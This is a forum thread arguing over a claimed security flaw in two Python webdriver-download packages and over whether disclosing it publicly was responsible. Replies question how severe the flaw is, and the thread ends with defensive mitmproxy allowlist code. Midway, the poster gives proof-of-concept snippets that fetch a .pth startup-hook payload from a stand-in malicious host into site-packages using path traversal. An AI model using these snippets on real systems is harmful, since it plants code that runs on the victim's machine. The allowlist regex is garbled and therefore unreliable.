selenium webdriver or cover for arbitrary GET requests - AOS for Lemmy.World - A generic Lemmy server for everyone to use.

719

selenium webdriver or cover for arbitrary GET requests

9d 17h ago by programming.dev/u/logging_strict in python@programming.dev from github.com

Not all coders are created equal. But there should be a line where we collectively just say, "Please stop".

Would like to say found two critical issues in two Python packages, but it's obvious to a six year old. Not sure can claim credit for such in your face obvious issues.

And since it's so obvious, responsible disclosure kinda got kicked to the curb.

These libraries pin the required dependencies and test only one python interpreter, so lets just say had lowered expectations going in.

get-gecko-driver and get-chrome-driver look like they are unneeded since both selenium and webdriver-manager can download selenium webdrivers. In the later two packages, web browser support is sparse; there is room for more flexibility. For example, support for waterfox, librewolf, and mullvad-browser.

Issues summary:

downloader module can send a GET request to any URL. There is no URL whitelist. These packages can be used for cover when making arbitrary GET requests.
downloader can save anywhere on the file system. So can be used for other purposes besides downloading selenium webdriver.
no permission checks before saving/writing the file.
get_gecko_driver.downloader and get_chrome_driver.downloader are the exact same module.

I lack confidence the author will respond, will be very pleasantly surprised if the author fix these issues in a timely manner. Nor confidence he'd do a good job. But at least these issues are disclosed and the ball is in his court.

For your entertainment:

All these coding errors are unforgivable and obvious to even a novice coder, a laymen, or a random drunk. It takes talent not to see it. If bothered to do unit testing, would be unavoidable to not see it.

These issues are both CRITICAL SECURITY issues.

Obvious is obvious, don't kill the messenger, instead lets just fix this issue. The correct action is to quickly fix it and then just agree never to mention it again and pray there is no Darwin award for coders.

You decided not to responsibly disclose a security vulnerability that you assessed to be critical, because you thought it was obvious?

Also way to go not taking the side of:

an active member of this community
someone understanding and in a position to increase browser support for selenium webdrivers
a coder who'd care and doesn't suck at coding

So what do you get for the Captain Obvious comment besides being right? A clock is right twice a day. But no dopamine hit from a clock.

A better strategy, would be to ask about how to go about increasing selenium web driver browser support and whether a more flexible package is in the works. Not to defend a hopeless package in dire need of a rewrite. Or to provide the info i ask for about how to go about responsibly disclosing security issues.

Understand your heart is in the right place. Hope you can understand that alone isn't the only consideration or way to look at this. You can press the issue and still come away with nothing.

rinse wash repeat and still the reflex reaction will remain the same. I'm suggesting trying something else.

Okay I think it's worth responding to these point by point:

Also way to go not taking the side of an active member of this community

I'm not taking sides. Being an active member of a community doesn't absolve you or anyone else of behaving irresponsibly.

[Also way to go not taking the side of] someone understanding and in a position to increase browser support for selenium webdrivers

I don't doubt your intention to increase browser support for selenium webdrivers. However I don't agree with your decision to disclose what you deem a critical security bug without any indication that you attempted to disclose the issue to the project maintainer before advertising the issue here.

[Also way to go not taking the side of] a coder who'd care and doesn't suck at coding

Your coding ability in this situation is not in question or an issue.

So what do you get for the Captain Obvious comment besides being right? A clock is right twice a day. But no dopamine hit from a clock.

What I got were clarifications to questions I had after reading your original post. I wanted to make sure that I hadn't made any quick assumptions before I concluded whether or not I thought you had behaved ethically.

A better strategy, would be to ask about how to go about increasing selenium web driver browser support and whether a more flexible package is in the works. Not to defend a hopeless package in dire need of a rewrite. Or to provide the info i ask for about how to go about responsibly disclosing security issues.

Your original post didn't ask how to responsibly disclose a security issue. And you posted this, by your own admission, without responsibly disclosing.

For future reference, here is how you responsibly disclose critical security issues to a project: you find contact information for a maintainer or, if available, the project's security team. You send them a message confidentially (email, private message, issue tracker post stating you have found a critical issue you wish to disclose securely). You wait for them to get back to you. If they do, you coordinate a fix, and then you wait for the fix to be released and communicated before releasing details of the issue.

If the maintainer doesn't get back to you, try another maintainer. If they don't get back to you, then you've done all you can and you can release information on the issue.

Let me ask you: what was your intention behind your original post? You haven't provided a fix here, or a PR, as far as I can see you haven't forked the project with a fix. So I don't understand how doing this makes the situation any better, if anything it's placed the users of this project at a higher risk.

These packages are selenium webdriver flavored curl.

Did not set out to be a security researcher chasing bug bounties. Was not looking to discover exploits. It just happened. Read enough packages and eventually by random chance it's bound to happen.

After submitting an issue (admittedly in the open), have not submitted PR to fix the attack packages. Even if wanted to, PRs happen AFTER an issue is approved by the author/maintainer.

Have posted 4 issues without any response. The 5th magically disappeared. There has been no comments from the author.

Appealing to the author might not be the correct tactic. Just wondering if these are the sort of packages pypi.org takes down.

intention behind your original post? You haven’t provided a fix here, or a PR, as far as I can see you haven’t forked the project with a fix

Working on a bigger project which is on my local machine. Got to the point wanted to maximize the selenium webdrivers supported browsers. Currently writing the selenium webdriver related unit tests. Have no issue with branching off the parts dealing with selenium webdrivers and publishing that. It's just not at that stage. And will probably refactor it again to conform to webdriver-manager standards.

While doing the testing, and while fixing the geckodriver chained downloader, went thru multiple stages of denial until realized these packages main focus is the downloader, and the installing selenium web drivers is merely window dressing.

The fixes are trivial:

allowed (base) URLs whitelist
limit allowed destination folders
providing destination folder is not optional

Yes. That would be a fair assessment. Don't disagree with you.

Do you think made the wrong ethical call? My position is the author isn't a serious person who'll:

respond
know how to deal with a PR
care

So it's better to inform anyone happening upon get-gecko-driver and get-chrome-driver and do it ASAP. Which i did.

If you made no attempt to disclose this to the author before posting here, then I disagree with your judgement on this.

Made an issue, it magically disappeared. Admittedly in the open attempt did occur.

Would like to point to issue #5 as evidence, but it was unexpectedly removed.

Can you clarify what the problem is?

1 and 2 are not issues by themselves, cURL can do that.

3 is maybe a problem, but surely it doesn't bypass the filesystem permissions right? If it does, sure, that's a problem. If not, that's just curl.

These packages aren't intended to be curl and they shouldn't be capable of being curl. So it's unexpected behavior from these packages. The worst that can happen is use in ddos attacks or sabotaging a user's files by overwriting them.

The package doesn't alter fs permissions, but can write anywhere that has permission to do so.

Is this not enough?

Okay, so it can do arbitrary downloads. That's unideal, but in its normal operation it downloads a full webbrowser that can do arbitrary downloads. And its a thin wrapper around requests, which can do arbitrary downloads. Not sure that's really a high severity issue imho.

Recently on this community this article was posted exploits .pth startup hook which leads to this blog post

This requires two files: _index.js and [something]-setup.pth.

Can download these using either get-gecko-driver or get-chrome-driver.

>>> from get_gecko_driver import downloader
>>> url_0 = "https://malicioussite.com/_index.js"
>>> url_1 = "https://malicioussite.com/important-setup.pth"
>>> output_path = "../../.venv/lib/python3.11/site-packages/oftenusedpackage"
>>> downloader.download(url_0, output_path=output_path, file_name=None)
>>> downloader.download(url_1, output_path=output_path, file_name=None)

... the machine is part of a botnet

Installing malware is unexpected behavior from a selenium webdriver downloader. Although it's a thin wrapper around requests, it still has to be used responsibly.

You can do exactly that with curl, requests, telnet, netcat or even plain bash. Doesn't make it high severity.

The code you provided is actually behaving exactly as expected. You called the internal download function and it did it.

If you have a way to get it to download arbitrary files from its intended api that would be much more serious, but that's not what your showing.

from get_gecko_driver import GetGeckoDriver

# Install the driver:
# Downloads the latest GeckoDriver version
# Adds the downloaded GeckoDriver to path
get_driver = GetGeckoDriver()
get_driver.install()

Do you have a technique to make the above code download an arbitrary URL to an arbitrary file location?

To get the same effect from GetGeckoDriver().install()

from unittest.mock import patch

from get_gecko_driver.get_driver import GetGeckoDriver

target_package_path = "../../../.venv/lib/Python3.11/site-packages"
# e.g. 'geckodriver/linux64/0.36.0'
remove_subfolders = "../../.."
output_path = f"{target_package_path}/somepackage/{remove_subfolders}"
url_arbritrary = "https://maliciousurl.com/_index.js"
with patch(
    "get_gecko_driver.get_driver.GetGeckoDriver.version_url",
    return_value=url_arbritrary,
):
    get_driver.install(output_path=output_path)

The URL limiting and dest folder limiting aren't hardcoded within get_gecko_driver.downloader.download (module level func), making it unpatchable. Instead the GetGeckoDriver is patch friendly.

Assumes all Python coders have experience writting unittest or pytest. So usage of unittest.mock.patch is common knowledge and second nature. So absolutely no one would struggle writing the above code.

To protect against patching, the base URL cannot be within get_gecko_driver.constants and then import by another module. Although not DRY, the base URL must be hardcoded minimally within get_gecko_driver.downloader.download (in the whitelist) and optionally also within get_gecko_driver.get_driver.GetGeckoDriver.install (to raise an exception with a meaningful and actionable message).

Anything you do to fix this "issue" can also be defeated by mock.patch.

You could just mock.patch the entire download function to do anything at all.

Had to research how to go about running untrusted code safely.

In-process there are actions that can be taken to deter mock.patch, but it wouldn't defeat a determined adversary. A subprocess isn't a sufficient security layer although it would prevent mock.patch a module.

To deter a determined adversary, recommend to use Docker or Firecracker MicroVMs.

So glad we are having this conversation. Instead of jumping in with a fix that is not actually effective.

Within a docker container, mitmproxy can sit filtering network traffic by URLs, rather than IP and port. Ignore in this example only one URL is allowed.

In pyproject.toml,

[project.scripts]
webdriver_urls_filter = "mypackage.somefolder.mitmproxy_runner:main"

In mypackage.somefolder.mitmproxy_filters,

import re
from typing import TYPE_CHECKING

from mitmproxy import ctx

if TYPE_CHECKING:
    from mitmproxy import http


def request(flow: "http.HTTPFlow") -> None:
    """Run this proxy.

    :type flow: mitmproxy.http.HTTPFlow
    """
    url = flow.request.pretty_url

    # Rather than exact, interested in limiting the base URL
    ALLOWED_PATTERN = re.compile(r"^https://github//.com/myorg/myrepo/releases/download/v1/.2/.3/.*$")
    
    # Check if URL matches the allowed release pattern
    
    try:
        if ALLOWED_PATTERN.match(url):
            ctx.log.info(f"Download allowed: {url}")
        else:
            ctx.log.error(f"Download blocked: {url}")
            flow.kill()
    except Exception as e:
        # FAIL SECURE: If inspection fails, kill the connection to prevent bypass
        ctx.log.error(f"Script error, blocking flow: {e}")
        flow.kill()

In mypackage.somefolder.mitmproxy_runner,

from mitmdump import DumpMaster
from mitmproxy import options

from . import mitmproxy_filters  # addon module

def main() -> None:
    """Rather than calling `mitmdump -s myscript.py`."""
    opts = options.Options(listen_port=8080)
    master = DumpMaster(opts)

    if hasattr(mitmproxy_filters, 'addons'):
        # explicit format which defines a class then appends an instance to
        # :code:`addons = []`
        master.addons.add(*mitmproxy_filters.addons)
    else:
        # Module itself acts as addon
        master.addons.add(mitmproxy_filters)
    
    master.run()

The docker container has one network proxy which has web access. Everything else has no web access instead traffic is directed thru the proxy. The proxy calls, webdriver_urls_filter.

Somehow, not by me, the disclosure was deleted. The issues raised have not been addressed. Way to handle it, ignore it. LOL!

So the head in sand approach it is. Or fck off it's as-is (aka MIT licensed). Either github or the author pulled a MSFT. Unfortunately cannot tell who deleted it.

I feel vindicated. Didn't get the impression this author can be collaborated with.

Lets say wanted to responsibly disclose, for a change, these security issues. For future reference, is there a step to step guide for Python on how to do that.

Checked, no code of conduct. Good i'm in the clear.

And get-gecko-driver has 8 stars. Tried to see who starred it. Very kind people who unfortunately are anonymous. While trying to see who starred it, accidentally starred it. Luckily can unstar it, avoiding eternal shame.